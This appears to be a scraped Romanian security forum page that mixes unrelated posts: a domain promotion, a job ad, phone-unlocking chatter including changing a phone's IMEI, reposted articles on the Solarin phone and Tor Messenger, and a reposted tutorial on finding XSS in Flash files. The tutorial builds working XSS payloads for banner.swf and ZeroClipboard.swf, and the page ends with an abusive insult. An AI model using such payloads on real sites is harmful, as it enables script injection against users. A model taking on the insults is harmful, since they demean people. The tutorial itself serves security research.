Leaderboard

It's .XYZ's second birthday! To celebrate, Namecheap is offering a cool deal on this hot TLD - just $0.02 on the 1st & 2nd of this month! Late to the party? No problem, get .xyz for just 15 cents for the rest of June. Link: https://www.namecheap.com/domains/registration/gtld/xyz.aspx Ai şi WhoisGuard gratis.

Caut programatori cu experienta (5-10 ani) Cerinte: - Bun cunoscator php, mysql, javascript (css/html/bootstrap) - Cunostinte platforme open source (exemplu: wordpress) - Capacitatea de a comunica si de a lucra in echipa - Disponibilitate job full time (Bucuresti/Universitate) Beneficii: - Pachet salarial bun (1000-5000 EURO, in functie de experienta) - Training, cursuri (te sustinem daca vrei sa inveti) - Cafea, ceai, carti la discretie (se va lucra intr-un mediu foarte relaxat) - Colegi tineri si deschisi la minte ;-) Daca indeplinesti conditiile, imi poti trimite CV-ul tau / proiecte la adresa office@kapye.com ori PM.

Cu xposed si framework-ul lor il poti rescrie, ori cu mobile uncle tools, totusi care-i modelul ca nu ghicim in glob..

.......................

Avast da... hahahha

Sirin Labs launches ultra-secure, ultra-expensive Solarin smartphone It's the 'best' and 'most secure' phone ever made, its maker claims. By Charles McLellan for Product Central | May 31, 2016 -- 20:40 GMT (21:40 BST) | Topic: Smartphones Sirin Labs' co-founders Kenes Rakishev, Moshe Hogeg and Tal Cohen launch the Solarin smartphone in London. Image: Charles McLellan/ZDNet If you're a startup launching into the hyper-competitive smartphone market, then -- as well as plenty of funding and nerves of steel -- you'll need to target a sector with room for yet another vendor. Sirin Labs, co-founded in 2013 by Kenes Rakishev (chairman), Moshe Hogeg (president) and Tal Cohen (CEO), is funded to the tune of $72 million (£49.6m) and launched its first product,Solarin -- which Hogeg confidently described as "the best phone ever made, and for sure the most secure phone ever made" -- in central London today. Solarin is also one of the most expensive smartphones ever made, starting at £9,500/$14,800 plus taxes. Despite its price, the 5.5-inch Android-based Solarin is largely free of 'bling'-style decoration. Image: Sirin Labs Of course, expensive smartphones are available from the likes of Vertu, and secure ones from Silent Circle and others, so Sirin Labs isn't exactly entering virgin territory. But if you're a business leader, entrepreneur or financier with a lot of confidential information, a lot of communication needs, and the wherewithal to drop ten grand (sterling) on a phone, then Sirin Labs thinks you're a potential customer. Despite its price, Solarin isn't an over-decorated 'bling' phone. Indeed, this Swedish-designed-and-built Android (5.1) handset looks relatively restrained. It packs a decent, if not always cutting-edge, specification, including: A 2GHz Qualcomm Snapdragon 810 octa-core SoC with 4GB of RAM and 128GB of internal storage; A 5.5-inch Gorilla Glass 4-protected IPS LCD with 2,560 by 1,440 resolution (538ppi), delivering 120 percent of the sRGB colour gamut, 1,500:1 typical contrast ratio and 600cd/m2 typical brightness; A 24-megapixel main camera with laser autofocus, quad-tone flash, optical image stabilisation and 4k video recording at 30fps, plus an 8-megapixel front camera with flash, electrical image stabilisation and HD video recording at 60fps; An audio subsystem comprising three bass-boosted speakers and four microphones, plus a smart amplifier designed to maximise volume while minimising distortion; Support for 24 LTE bands, 802.11ac wi-fi with 2x2 MU-MIMO and 60GHz WiGig; and A 4,040mAh li-ion battery with claimed talk time of 31 hours (UMTS), standby time of 'over 2 weeks' and Qualcomm QuickCharge 2.0 support "Whenever you see something in our spec that isn't the latest, there's a very good reason for that," said CEO Tal Cohen at the launch, citing the 2k screen's combination of brightness, colour gamut and power consumption as an advantage over a 4k screen as an example. The Solarin measures 78mm wide by 159.8mm deep by 11.1mm thick, weighs 243g, is water/dust resistant to IP54 level and comes in Fibre Black Carbon Titanium, Fibre Black Carbon DLC, Fibre Black Carbon Yellow Gold and Crystal White Carbon DLC variants. Security Solarin's Security Shield mode offers hardware-based, end-to-end encrypted VoIP calls and messages. Image: Charles McLellan/ZDNet Security is Sirin Labs' main focus, and its solution for the Solarin phone comprises three main elements: Mobile threat protection from Zimperium, offering continuous protection against network, host-based and physical attacks; Encrypted email powered by ProtonMail, which combines public-key cryptography with symmetric encryption protocols to offer end-to-end encryption via a 2-password system; and Security Shield from KoolSpan, which enables hardware-based, end-to-end encrypted VoIP calls and messages using military-grade AES-256, FIPS 140-2 encryption. Security Shield mode is activated via a sliding Security Switch above the camera lens (diamond-inlaid, naturally), which also shuts down unnecessary operations on the phone. Is Sirin Labs' Solarin the best and most secure phone ever made, as co-founder and president Moshe Hogeg claims? Given the price, it'll need to be, and we look forward to investigating further in a full review in due course. If that ten grand is burning a hole in your pocket, the Solarin is available online now, at Sirin Labs' store in London's Mayfair (34 Bruton Place) from 1 June, and from Harrods in Knightsbridge from 30 June. Update, June 2 2016 Vertu is the best-known name in the 'luxury technology' market, and ZDNet asked CEO Gordon Watson for his reactions to Sirin Labs' Solarin launch: "Vertu is always interested to see new entrants in the luxury technology space and we welcome competition to the market. While that category has had many players over the years, Vertu has often been a lone voice within it. However, while the luxury technology category is growing, competing within it is tough, particularly with high-end or luxury mobile phones. Vertu has been honing its business for 18 years and continues to innovate in order to keep pace with changes in both the technology and luxury industries," said Watson. On the Solarin phone's emphasis on security and design/build quality rather than overtly luxurious features, Watson had this to say: "At this stage we've not seen the product first hand, so it would be impossible to judge it fairly. Vertu's smartphone products have been the brand's best sellers over the last three years and these combine leading-edge technology, precision-engineered build and a suite of personalised and curated services -- the combination of these three elements are vital to Vertu and allow us to offer a unique proposition." "We also believe that e-commerce, a global retail network and strong after-sales care add significantly to the consumer experience. Security has been a fundamental of the Vertu brand since the launch of its Signature S model in 2002 and the company continues to work closely with in-house security experts as well as external partners -- not least Google -- to ensure that customers are fully protected." And on Vertu's roadmap: "Vertu switched investment partners in the last quarter of 2015, moving to a team with knowledge of both the technology industry and the evolving Asian luxury market. The benefits of this new investment and expertise will be seen with a series of product launches in the latter part of 2016 and beyond." Sursa: http://www.zdnet.com/article/sirin-labs-launches-ultra-secure-ultra-expensive-solarin-smartphone/

o porcarie de $16k

se scrie pe box z3x si costa in jur de 50 de lei la service

Am un utok 351D cu alt imei si merge perfect nu am probleme cu mesajels/apelurile.

25 MAY 2016 on security Over the years I found a lot of cross-site scripting vulnerabilities in flash files (recognizable by the .swf extension). Finding cross-site scripting vulnerabilities in flash files is some sort of a hobby for me because it almost always succeeds. It's pretty obvious that the awareness of cross-site scripting vulnerabilities is even lower than those of PHP developers. To start, unfortunately you can't do "right mouse click, view-source" on a flash file but fortunately there are a couple of tools that can do it for you. For example http://www.showmycode.com/. A large list of tools can be found here: http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html To demonstrate how I analyze a flash file I'm going use the banner.swf file and the zeroclipboard.swf cross-site scripting for example of which the banner.swf is a commonly known mistake and the zeroclipboard.swf file is a known vulnerable flash file that has been made public in 2012 on Github (https://github.com/zeroclipboard/zeroclipboard/issues/14). banner.swf This vulnerability is pretty basic. When the clicktag function in Actionscript allows unfiltered user input it can used to inject javascript url's for example javascript:alert(1). The getUrl function is used a lot and is often poorly filtered or not filtered at all. An example of a vulnerable flash file decompiled via showmycode: on (release) { geturl (_root.clickTAG, "_self"); } on (release) is a trigger that execute a code when the mouse is pressed and _root.clickTAG stands for the clickTAG parameter which is not escaped or what so ever and is therefor vulnerable for cross-site scripting attacks. The vulnerability could be reproduced by going to the following these steps: Go to banner.swf?clickTAG=javascript:alert(1) A press on the page (anywhere in this case) zeroclipboard.swf Zeroclipboard is a library used to modify the users clipboard often used to provide a "copy to clipboard" functionality. This vulnerability is a bit more complex than the banner.swf. Huge companies like coindesk and Yahoo were vulnerable for this vulnerability so for me it's pretty interesting to know where this issue originated from. To start our search we need a vulnerable zeroclipboard file. A mirror of the vulnerable version can be downloaded here:http://github.com/cure53/Flashbang/raw/master/flash-files/files/ZeroClipboard.swf I decompiled the source using showmycode: package { import flash.events.*; import flash.display.*; import flash.external.*; import flash.system.*; import flash.utils.*; public class ZeroClipboard extends Sprite { private var button:Sprite; private var id:String = ""; private var clipText:String = ""; public function ZeroClipboard(){ super(); stage.scaleMode = StageScaleMode.EXACT_FIT; Security.allowDomain("*"); var flashvars:* = LoaderInfo(this.root.loaderInfo).parameters; id = flashvars.id; button = new Sprite(); button.buttonMode = true; button.useHandCursor = true; button.graphics.beginFill(0xCCFF00); button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); button.alpha = 0; addChild(button); button.addEventListener(MouseEvent.CLICK, clickHandler); button.addEventListener(MouseEvent.MOUSE_OVER, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOver", null); }); button.addEventListener(MouseEvent.MOUSE_OUT, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOut", null); }); button.addEventListener(MouseEvent.MOUSE_DOWN, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseDown", null); }); button.addEventListener(MouseEvent.MOUSE_UP, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseUp", null); }); ExternalInterface.addCallback("setHandCursor", setHandCursor); ExternalInterface.addCallback("setText", setText); ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null); } public function setHandCursor(_arg1:Boolean){ button.useHandCursor = _arg1; } private function clickHandler(_arg1:Event):void{ System.setClipboard(clipText); ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); } public function setText(_arg1){ clipText = _arg1; } } }//package The function we are searching for is ExternalInterface.call. This function is used to call JavaScript functions from flash files and it's unreliable. When unfiltered input is passed to this function it's possible to inject your own JavaScript. A quick search for ExternalInterface.call returned: ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); What we have to do now is find out how this function get's triggered. The example I used sits within a function called clickHandler so I did a quick search for clickHandler and found that it get's triggered when there is a click on a element named "button". What is button? Well, button = new Sprite(); which is a class used for user interface components. Let's take a look at the part where the sprite is created: button = new Sprite(); button.buttonMode = true; button.useHandCursor = true; button.graphics.beginFill(0xCCFF00); button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); button.alpha = 0; addChild(button); By looking at this part you might already have noticed the 5th line. button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); This part determines the width and height of the button sprite by using two variables. flashvars.width and flashvars.height. To find out where this parameters are set we don't have to look very far. By searching for flashvarsit's pretty easy to find out that flashvars stands for LoaderInfo(this.root.loaderInfo).parameters; which is used to get the parameters from a request. So, to set the width and height from the button element we have to add two parameters to the zeroclipboard.swf file in the url. Now, when the mouse is hovered over the button the function clickHandler will be called which triggers our vulnerable part of code that we want to reach. /zeroclipboard.swf?width=1000&height=1000 Now we have to exploit the vulnerable part of code, let's get back to the vulnerable line: ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); The id variable actually is user input, you can see that by searching for the id variable. In the code you will find id = flashvars.id; So, now we know that the variable id can be set by requesting the flash file with the parameter id (I almost could have guessed it..) To turn this into a cross-site scripting we first have to know how ActionScript generates the JavaScript code for the ExterinalInterface.call The code looks like this: try { __flash__toXML(ZeroClipboard.dispatch("USER INPUT HERE","load",null)) ; } catch (e) { "<undefined/>"; } User input is located at "USER INPUT HERE" so there is where we should try to break out. First we need to get out of the double quotes. We can't just do this by typing "because ActionScript does escape this input. Luckily it can be escaped by adding a backslash in front of it. So our payload needs to start with \". This will turn the generated JavaScript into: try { __flash__toXML(ZeroClipboard.dispatch("\\"","load",null)) ; } catch (e) { "<undefined/>"; } All we have to do now is inject our own script and make sure that it's valid JavaScript. First, let's add two forward slashes at the end of our payload. By adding two forward slashes at the end of our payload JavaScript will see everything behind it as a command try { __flash__toXML(ZeroClipboard.dispatch("\\"//","load",null)) ; } catch (e) { "<undefined/>"; } Because we shopped of the end of the function it now looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\" This is invalid JavaScript but we can fix that! Let's start by ending two the functions ZeroClipboard.dispatch and __flash__toXML Our payload now looks like this: \"))// and the generated JavaScript looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\")) Now we have to end the try statement, we do this by using } catch(e) {} Our payload now looks like this: \"))} catch(e) {}// and the generated JavaScript looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\"))} catch(e) {} This is perfectly valid JavaScript, all we have to do now is inject our payload. We can add the payload (for example, an alert) in the catch statement like this: \"))} catch(e) {alert(1);}// which makes the final url: /zeroclipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 List of known vulnerable flash files I started a public spreadsheet where everybody can contribute to make a list of vulnerable SWF files. You can contribute to the list here: https://docs.google.com/spreadsheets/d/1zWc4Sf0pk_6lDVG0Lm-SjFbVVR8hY5X9WoKJNPhGWCs The list Flashbang An awesome tool that can help you to find vulnerabilities in flash files is flashbang. It can be found here: https://cure53.de/flashbang. It's created by cure53 (obviously) and it's even open source on Github available here:https://github.com/cure53/Flashbang Resources http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/ https://github.com/DBA/swf_file https://github.com/cure53/Flashbang https://github.com/zeroclipboard/zeroclipboard/issues/14 http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html smiegles Read more posts by this author. Sursa: https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/

Tor Messenger Beta: Chat over Tor, Easily Posted October 29th, 2015 by sukhbir in Today we are releasing a new, beta version of Tor Messenger, based on Instantbird, an instant messaging client developed in the Mozilla community. What is it? Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enablesOff-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages. What it isn't... Tor Messenger builds on the networks you are familiar with, so that you can continue communicating in a way your contacts are willing and able to do. This has traditionally been in a client-server model, meaning that your metadata (specifically the relationships between contacts) can be logged by the server. However, your route to the server will be hidden because you are communicating over Tor.We are also excited about systems like Pond and Ricochet, which try to solve this problem, and would encourage you to look at their designs and use them too. Why Instantbird? We considered a number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice -- its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users. Current Status Today we are releasing a beta version with which we hope to gain both usability and security related feedback. There have been three previous alpha releases to the mailing lists that have already helped smooth out some of the rougher edges. Downloads Linux (32-bit)Linux (64-bit)WindowsOS Xsha256sums.txt sha256sums.txt.ascThe sha256sums.txt file containing hashes of the bundles is signed with the key0x6887935AB297B391 (fingerprint: 3A0B 3D84 3708 9613 6B84 5E82 6887 935A B297 B391). Instructions On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory. Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended. Source Code We are doing automated builds of Tor Messenger for all platforms.The Linux builds are reproducible: anyone who builds Tor Messenger for Linux should have byte-for-byte identical binaries compared with other builds from a given source. You can build it yourself and let us know if you encounter any problems or cannot match our build. The Windows and OS X builds are not completely reproducible yet but we areworking on it. What's to Come Our current focus is security, robustness and user experience. We will be fixing bugs and releasing updates as appropriate, and in the future, we plan on pairing releases with Mozilla's Extended Support Release (ESR) cycle. We have some ideas on where to take Tor Messenger but we would like to hear what you have to say. Some possibilities include: Reproducible builds for Windows and OS X Sandboxing Automatic updates Improved Tor support OTR over Twitter DMs Produce (and distribute) internationalized builds Secure multi-party communication (np1sec) Encrypted file-transfers Usability study How To Help Give it a try and provide feedback, requests, and file bugs (choose the "Tor Messenger" component). If you are a developer, help us close all our tickets or help us review ourdesign doc. As always, we are idling on IRC in #tor-dev (OFTC) (nicks: arlolra; boklm; sukhe) and subscribed to the tor-talk/dev mailing lists.Please note that this release is for users who would like to help us with testing the product but at the same time who also understand the risks involved in using beta software.Thanks and we hope you enjoy Tor Messenger! Sursa: https://blog.torproject.org/blog/tor-messenger-beta-chat-over-tor-easily

Se vede deja dupa limbajul tau cat de "idiot poti fi". Crezi ca-mi pasa mie de vechimea ta pe aceasta comunitate? Nu te mai baga in seama ca un handicapat ca nu am nevoie ce jignirile tale de "copil avortat" . Asa ca iesi draq si cauta-ti de treaba.